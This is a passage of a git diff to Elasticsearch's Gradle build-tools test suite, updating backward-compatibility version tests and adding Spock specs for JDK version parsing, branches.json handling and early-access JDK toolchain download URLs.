addVersion('7.16.3') + addVersion('7.17.0') + addVersion('7.17.1') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.17.1') + addVersion('8.18.0') when: - def bwc = new BwcVersions(versionLines, v('8.18.0'), ['main', '8.x', '8.17', '8.16', '7.17']) + def bwc = new BwcVersions(v('8.18.0'), versions, [ + branch('main', '9.1.0'), + branch('9.0', '9.0.1'), + branch('8.x', '8.18.0'), + branch('8.17', '8.17.1'), + branch('8.16', '8.16.1'), + branch('7.17', '7.17.1'), + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:maintenance'), - (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:bugfix2'), - (v('8.17.1')): new UnreleasedVersionInfo(v('8.17.1'), '8.17', ':distribution:bwc:bugfix'), + (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:major1'), + (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:minor2'), + (v('8.17.1')): new UnreleasedVersionInfo(v('8.17.1'), '8.17', ':distribution:bwc:minor1'), (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.x', 
':distribution'), ] bwc.wireCompatible == [v('7.17.0'), v('7.17.1'), v('8.14.0'), v('8.14.1'), v('8.14.2'), v('8.15.0'), v('8.15.1'), v('8.15.2'), v('8.16.0'), v('8.16.1'), v('8.17.0'), v('8.17.1'), v('8.18.0')] @@ -220,30 +262,37 @@ class BwcVersionsSpec extends Specification { def "current version is new minor with staged minor"() { given: - addVersion('7.16.3', '8.9.0') - addVersion('7.17.0', '8.9.0') - addVersion('7.17.1', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.18.0', '9.10.0') + addVersion('7.16.3') + addVersion('7.17.0') + addVersion('7.17.1') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.18.0') when: - def bwc = new BwcVersions(versionLines, v('8.18.0'), ['main', '8.x', '8.17', '8.16', '8.15', '7.17']) + def bwc = new BwcVersions(v('8.18.0'), versions, [ + branch('main', '9.0.0'), + branch('8.x', '8.18.0'), + branch('8.17', '8.17.0'), + branch('8.16', '8.16.1'), + branch('8.15', '8.15.2'), + branch('7.17', '7.17.1'), + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:maintenance'), - (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:bugfix2'), - (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:bugfix'), - (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.17', ':distribution:bwc:staged'), + (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:major1'), + (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:minor3'), + (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:minor2'), + (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.17', ':distribution:bwc:minor1'), (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.x', ':distribution'), ] bwc.wireCompatible == [v('7.17.0'), v('7.17.1'), v('8.14.0'), v('8.14.1'), v('8.14.2'), v('8.15.0'), v('8.15.1'), v('8.15.2'), v('8.16.0'), v('8.16.1'), v('8.17.0'), v('8.18.0')] @@ -252,26 +301,33 @@ class BwcVersionsSpec extends Specification { def "current version is first bugfix"() { given: - addVersion('7.16.3', '8.9.0') - addVersion('7.17.0', '8.9.0') - addVersion('7.17.1', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') + addVersion('7.16.3') + addVersion('7.17.0') + addVersion('7.17.1') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') when: - def bwc = new BwcVersions(versionLines, v('8.16.1'), ['main', '8.x', '8.17', '8.16', '8.15', '7.17']) + def bwc = new BwcVersions(v('8.16.1'), versions, [ + branch('main','9.0.1'), + branch('8.x','8.18.0'), + branch('8.17','8.17.0'), + branch('8.16','8.16.1'), + branch('8.15','8.15.2'), + 
branch('7.17','7.17.1'), + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:maintenance'), - (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:bugfix'), + (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:major1'), + (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:minor1'), (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution'), ] bwc.wireCompatible == [v('7.17.0'), v('7.17.1'), v('8.14.0'), v('8.14.1'), v('8.14.2'), v('8.15.0'), v('8.15.1'), v('8.15.2'), v('8.16.0'), v('8.16.1')] @@ -280,37 +336,46 @@ class BwcVersionsSpec extends Specification { def "current version is second bugfix"() { given: - addVersion('7.16.3', '8.9.0') - addVersion('7.17.0', '8.9.0') - addVersion('7.17.1', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') + addVersion('7.16.3') + addVersion('7.17.0') + addVersion('7.17.1') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') when: - def bwc = new BwcVersions(versionLines, v('8.15.2'), ['main', '8.x', '8.17', '8.16', '8.15', '7.17']) + def bwc = new BwcVersions(v('8.15.2'), versions, [ + branch('main', '9.0.1'), + branch('8.x', '8.18.1'), + branch('8.17', '8.17.2'), + branch('8.16', '8.16.10'), + branch('8.15', '8.15.2'), + branch('7.17', '7.17.1'), + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:maintenance'), + (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:major1'), (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution'), ] bwc.wireCompatible == [v('7.17.0'), v('7.17.1'), v('8.14.0'), v('8.14.1'), v('8.14.2'), v('8.15.0'), v('8.15.1'), v('8.15.2')] bwc.indexCompatible == [v('7.16.3'), v('7.17.0'), v('7.17.1'), v('8.14.0'), v('8.14.1'), v('8.14.2'), v('8.15.0'), v('8.15.1'), v('8.15.2')] } - private void addVersion(String elasticsearch, String lucene) { - def es = Version.fromString(elasticsearch) - def l = Version.fromString(lucene) - versionLines << " public static final Version V_${es.major}_${es.minor}_${es.revision} = new Version(0000000, org.apache.lucene.util.Version.LUCENE_${l.major}_${l.minor}_${l.revision});".toString() + private void addVersion(String elasticsearch) { + versions.add(Version.fromString(elasticsearch)) } private Version v(String version) { return Version.fromString(version) } + private DevelopmentBranch branch(String name, String version) { + return new DevelopmentBranch(name, v(version)) + } + } diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/JdkSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/JdkSpec.groovy new file mode 100644 index 0000000000000..72aebda2e0b80 --- /dev/null +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/JdkSpec.groovy @@ -0,0 +1,46 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. 
Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal + +import spock.lang.Specification + +import org.gradle.api.artifacts.Configuration +import org.gradle.api.model.ObjectFactory +import org.gradle.api.provider.Property + +class JdkSpec extends Specification { + + def "jdk version is parsed correctly"() { + given: + Jdk jdk = newJdk() + + when: + jdk.setVersion(version) + then: + jdk.getBaseVersion() == baseVersion + jdk.getMajor() == major + jdk.getBuild() == buildNumber + + where: + version | baseVersion | major | buildNumber + "25-ea+30" | "25-ea+30" | "25" | "30" + "26-ea+6" | "26-ea+6" | "26" | "6" + } + + Jdk newJdk(String name = "jdk") { + Configuration configuration = Mock() + _ * configuration.getName() >> name + "Config" + + ObjectFactory objectFactory = Mock() + Property stringProperty = Mock() + _ * objectFactory.property(String.class) >> stringProperty + + return new Jdk(name, configuration, objectFactory) + } +} diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPluginSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPluginSpec.groovy new file mode 100644 index 0000000000000..bbb58041eee72 --- /dev/null +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPluginSpec.groovy @@ -0,0 +1,111 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.gradle.internal.info + +import groovy.json.JsonOutput +import spock.lang.Specification +import spock.lang.TempDir + +import org.elasticsearch.gradle.Version +import org.elasticsearch.gradle.internal.BwcVersions +import org.gradle.api.Project +import org.gradle.api.provider.Provider +import org.gradle.api.provider.ProviderFactory +import org.gradle.testfixtures.ProjectBuilder + +import java.nio.file.Path + +class GlobalBuildInfoPluginSpec extends Specification { + + @TempDir + File projectRoot + + Project project + + def setup() { + project = ProjectBuilder.builder() + .withProjectDir(projectRoot) + .withName("bwcTestProject") + .build() + project = Spy(project) + project.getRootProject() >> project + + File buildToolsInternalDir = new File(projectRoot, "build-tools-internal") + buildToolsInternalDir.mkdirs() + new File(buildToolsInternalDir, "version.properties").text = """ + elasticsearch = 9.1.0 + lucene = 10.2.2 + + bundled_jdk_vendor = openjdk + bundled_jdk = 24+36@1f9ff9062db4449d8ca828c504ffae90 + minimumJdkVersion = 21 + minimumRuntimeJava = 21 + minimumCompilerJava = 21 + """ + File versionFileDir = new File(projectRoot, "server/src/main/java/org/elasticsearch") + versionFileDir.mkdirs() + new File(versionFileDir, "Version.java").text = """ + package org.elasticsearch; + public class Version { + public static final Version V_8_17_8 = new Version(8_17_08_99); + public static final Version V_8_18_0 = new Version(8_18_00_99); + public static final Version V_8_18_1 = new Version(8_18_01_99); + public static final Version V_8_18_2 = new Version(8_18_02_99); + public static final Version V_8_18_3 = new Version(8_18_03_99); + public static final Version V_8_19_0 = new Version(8_19_00_99); + public static final Version V_9_0_0 = new Version(9_00_00_99); + public static final Version V_9_0_1 = new Version(9_00_01_99); + public static final Version V_9_0_2 = new Version(9_00_02_99); + public static final Version V_9_0_3 = new Version(9_00_03_99); + public static final Version V_9_1_0 = new Version(9_01_00_99); + public static final Version CURRENT = V_9_1_0; + + } + """ + } + + def "resolve unreleased versions from branches file set by Gradle property"() { + given: + ProviderFactory providerFactorySpy = Spy(project.getProviders()) + Path branchesJsonPath = projectRoot.toPath().resolve("myBranches.json") + Provider gradleBranchesLocationProvider = project.providers.provider { return branchesJsonPath.toString() } + providerFactorySpy.gradleProperty("org.elasticsearch.build.branches-file-location") >> gradleBranchesLocationProvider + project.getProviders() >> providerFactorySpy + branchesJsonPath.text = branchesJson( + [ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("9.0", Version.fromString("9.0.3")), + new DevelopmentBranch("8.19", Version.fromString("8.19.1")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + ] + ) + + when: + project.objects.newInstance(GlobalBuildInfoPlugin).apply(project) + BuildParameterExtension ext = project.extensions.getByType(BuildParameterExtension) + BwcVersions bwcVersions = ext.bwcVersions + + then: + bwcVersions != null + bwcVersions.unreleased.toSet() == ["9.1.0", "9.0.3", "8.19.1", "8.18.2"].collect { Version.fromString(it) }.toSet() + } + + String branchesJson(List branches) { + Map branchesFileContent = [ + branches: branches.collect { branch -> + [ + branch : branch.name(), + version: branch.version().toString(), + ] + } + ] + return 
JsonOutput.prettyPrint(JsonOutput.toJson(branchesFileContent)) + } +} diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTaskSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTaskSpec.groovy new file mode 100644 index 0000000000000..705c3a8335dc1 --- /dev/null +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/release/UpdateBranchesJsonTaskSpec.groovy @@ -0,0 +1,267 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.release + +import groovy.json.JsonOutput +import groovy.json.JsonSlurper +import spock.lang.Specification +import spock.lang.Subject +import spock.lang.TempDir + +import org.elasticsearch.gradle.Version +import org.elasticsearch.gradle.internal.info.DevelopmentBranch +import org.gradle.api.InvalidUserDataException +import org.gradle.api.Project +import org.gradle.testfixtures.ProjectBuilder + +class UpdateBranchesJsonTaskSpec extends Specification { + + @Subject + UpdateBranchesJsonTask task + + @TempDir + File projectRoot + JsonSlurper jsonSlurper = new JsonSlurper() + + def setup() { + Project project = ProjectBuilder.builder().withProjectDir(projectRoot).build() + task = project.tasks.register("updateBranchesJson", UpdateBranchesJsonTask).get() + task.branchesFile = new File(projectRoot, "branches.json") + } + + def "add new branch to branches.json (sorted by version) when --add-branch is specified"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.addBranch('8.19:8.19.0') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.19', version: '8.19.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + } + + def "remove branch from branches.json when --remove-branch is specified"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.removeBranch('8.18') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.17', version: '8.17.7'], + ] + } + + def "update branch version when --update-branch is specified"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.updateBranch('8.18:8.18.3') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def 
json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.3'], + [branch: '8.17', version: '8.17.7'], + ] + } + + def "change branches.json when multiple options are specified"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.addBranch('8.19:8.19.0') + task.removeBranch('8.18') + task.updateBranch('8.17:8.17.8') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.19', version: '8.19.0'], + [branch: '8.17', version: '8.17.8'], + ] + } + + def "fail when no --add-branch, --remove-branch or --update-branch is specified"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + thrown(InvalidUserDataException) + } + + def "fail when adding a branch that already exists"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.addBranch('8.18:8.18.3') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + thrown(InvalidUserDataException) + } + + def "fail when removing a branch that does not exist"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.removeBranch('8.19') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + thrown(InvalidUserDataException) + } + + def "fail when updating a branch that does not exist"() { + given: + branchesJson([ + new DevelopmentBranch("main", Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + task.updateBranch('8.19:8.19.0') + + when: + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + thrown(InvalidUserDataException) + } + + def "fail when adding a branch with an invalid version"() { + given: + branchesJson([ + new DevelopmentBranch("main", 
Version.fromString("9.1.0")), + new DevelopmentBranch("8.18", Version.fromString("8.18.2")), + new DevelopmentBranch("8.17", Version.fromString("8.17.7")), + ]) + + when: + task.addBranch('8.19:invalid') + task.executeTask() + + then: + def branchesFile = new File(projectRoot, "branches.json") + def json = jsonSlurper.parse(branchesFile) + json.branches == [ + [branch: 'main', version: '9.1.0'], + [branch: '8.18', version: '8.18.2'], + [branch: '8.17', version: '8.17.7'], + ] + thrown(IllegalArgumentException) + } + + def "fail when branches.json is missing"() { + given: + task.updateBranch('8.19:8.19.0') + + when: + task.executeTask() + + then: + def exception = thrown(InvalidUserDataException) + exception.message.contains("branches.json has not been found") + } + + void branchesJson(List branches) { + File branchesFile = new File(projectRoot, "branches.json") + Map branchesFileContent = [ + branches: branches.collect { branch -> + [ + branch: branch.name(), + version: branch.version().toString(), + ] + } + ] + branchesFile.text = JsonOutput.prettyPrint(JsonOutput.toJson(branchesFileContent)) + } +} diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AbstractToolchainResolverSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AbstractToolchainResolverSpec.groovy index cea96437129a6..05372f25a4981 100644 --- a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AbstractToolchainResolverSpec.groovy +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AbstractToolchainResolverSpec.groovy @@ -73,6 +73,7 @@ abstract class AbstractToolchainResolverSpec extends Specification { _ * languageVersionProperty.get() >> languageVersion Property vendorSpecProperty = Mock() + _ * vendorSpecProperty.isPresent() >> true _ * vendorSpecProperty.get() >> vendorSpec _ * toolchainSpec.getVendor() >> vendorSpecProperty diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AdoptiumJdkToolchainResolverSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AdoptiumJdkToolchainResolverSpec.groovy index 5abb78b062c39..f26c9c46d52b3 100644 --- a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AdoptiumJdkToolchainResolverSpec.groovy +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/AdoptiumJdkToolchainResolverSpec.groovy @@ -47,7 +47,7 @@ class AdoptiumJdkToolchainResolverSpec extends AbstractToolchainResolverSpec { @Override def supportedRequests() { return [ - [19, ADOPTIUM, MAC_OS, X86_64, "https://api.adoptium.net/v3/binary/version/jdk-19.1.1.1+37.1/mac/x64/jdk/hotspot/normal/eclipse?project=jdk"], + [19, ADOPTIUM, LINUX, X86_64, "https://api.adoptium.net/v3/binary/version/jdk-19.1.1.1+37.1/linux/x64/jdk/hotspot/normal/eclipse?project=jdk"], [19, ADOPTIUM, WINDOWS, X86_64, "https://api.adoptium.net/v3/binary/version/jdk-19.1.1.1+37.1/windows/x64/jdk/hotspot/normal/eclipse?project=jdk"], [19, ADOPTIUM, MAC_OS, AARCH64, "https://api.adoptium.net/v3/binary/version/jdk-19.1.1.1+37.1/mac/aarch64/jdk/hotspot/normal/eclipse?project=jdk"], diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolverSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolverSpec.groovy new file mode 
100644 index 0000000000000..e13e52e23a35b --- /dev/null +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/EarlyAccessCatalogJdkToolchainResolverSpec.groovy @@ -0,0 +1,94 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.toolchain + +import org.elasticsearch.gradle.VersionProperties +import org.gradle.api.services.BuildServiceParameters +import org.gradle.jvm.toolchain.JavaLanguageVersion +import org.gradle.jvm.toolchain.JavaToolchainDownload +import org.gradle.jvm.toolchain.JavaToolchainResolver + +import static org.gradle.platform.Architecture.AARCH64 +import static org.gradle.platform.Architecture.X86_64 +import static org.gradle.platform.OperatingSystem.* + +class EarlyAccessCatalogJdkToolchainResolverSpec extends AbstractToolchainResolverSpec { + @Override + JavaToolchainResolver resolverImplementation() { + def resolver = new EarlyAccessCatalogJdkToolchainResolver() { + @Override + BuildServiceParameters.None getParameters() { + return null + } + } + resolver.earlyAccessJdkBuildResolver = (JavaLanguageVersion version) -> { + new EarlyAccessCatalogJdkToolchainResolver.PreReleaseJdkBuild(version, 30, 'ea') + } + return resolver + } + + def "resolves rc versions #os #arch #vendor jdk #langVersion"() { + given: + def resolver = new EarlyAccessCatalogJdkToolchainResolver() { + @Override + BuildServiceParameters.None getParameters() { + return null + } + } + resolver.earlyAccessJdkBuildResolver = (JavaLanguageVersion version) -> { + new EarlyAccessCatalogJdkToolchainResolver.PreReleaseJdkBuild(version, 30, 'rc') + } + when: + Optional download = resolver.resolve(request(JavaLanguageVersion.of(langVersion), vendor, platform(os, arch))) + + then: + download.get().uri == URI.create(expectedUrl) + where: + + [langVersion, vendor, os, arch, expectedUrl] << [ + [25, anyVendor(), LINUX, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-rc+30/openjdk-25_linux-x64_bin.tar.gz"], + [25, anyVendor(), LINUX, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-rc+30/openjdk-25_linux-aarch64_bin.tar.gz"], + [25, anyVendor(), MAC_OS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-rc+30/openjdk-25_macos-x64_bin.tar.gz"], + [25, anyVendor(), MAC_OS, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-rc+30/openjdk-25_macos-aarch64_bin.tar.gz"], + [25, anyVendor(), WINDOWS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-rc+30/openjdk-25_windows-x64_bin.zip"], + + [26, anyVendor(), LINUX, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-rc+30/openjdk-26_linux-x64_bin.tar.gz"], + [26, anyVendor(), LINUX, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-rc+30/openjdk-26_linux-aarch64_bin.tar.gz"], + [26, anyVendor(), MAC_OS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-rc+30/openjdk-26_macos-x64_bin.tar.gz"], + [26, anyVendor(), MAC_OS, AARCH64, 
"https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-rc+30/openjdk-26_macos-aarch64_bin.tar.gz"], + [26, anyVendor(), WINDOWS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-rc+30/openjdk-26_windows-x64_bin.zip"] + ] + } + + + @Override + def supportedRequests() { + return [ + [25, anyVendor(), LINUX, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-ea+30/openjdk-25-ea+30_linux-x64_bin.tar.gz"], + [25, anyVendor(), LINUX, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-ea+30/openjdk-25-ea+30_linux-aarch64_bin.tar.gz"], + [25, anyVendor(), MAC_OS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-ea+30/openjdk-25-ea+30_macos-x64_bin.tar.gz"], + [25, anyVendor(), MAC_OS, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-ea+30/openjdk-25-ea+30_macos-aarch64_bin.tar.gz"], + [25, anyVendor(), WINDOWS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/25/openjdk-25-ea+30/openjdk-25-ea+30_windows-x64_bin.zip"], + + [26, anyVendor(), LINUX, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+30/openjdk-26-ea+30_linux-x64_bin.tar.gz"], + [26, anyVendor(), LINUX, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+30/openjdk-26-ea+30_linux-aarch64_bin.tar.gz"], + [26, anyVendor(), MAC_OS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+30/openjdk-26-ea+30_macos-x64_bin.tar.gz"], + [26, anyVendor(), MAC_OS, AARCH64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+30/openjdk-26-ea+30_macos-aarch64_bin.tar.gz"], + [26, anyVendor(), WINDOWS, X86_64, "https://builds.es-jdk-archive.com/jdks/openjdk/26/openjdk-26-ea+30/openjdk-26-ea+30_windows-x64_bin.zip"] + ] + } + + @Override + def unsupportedRequests() { + [ + [Integer.parseInt(VersionProperties.bundledJdkMajorVersion) + 1, anyVendor(), WINDOWS, AARCH64], + ] + } +} diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolverSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolverSpec.groovy index 9de9cea65a393..3ea53043687b5 100644 --- a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/toolchain/OracleOpenJdkToolchainResolverSpec.groovy +++ 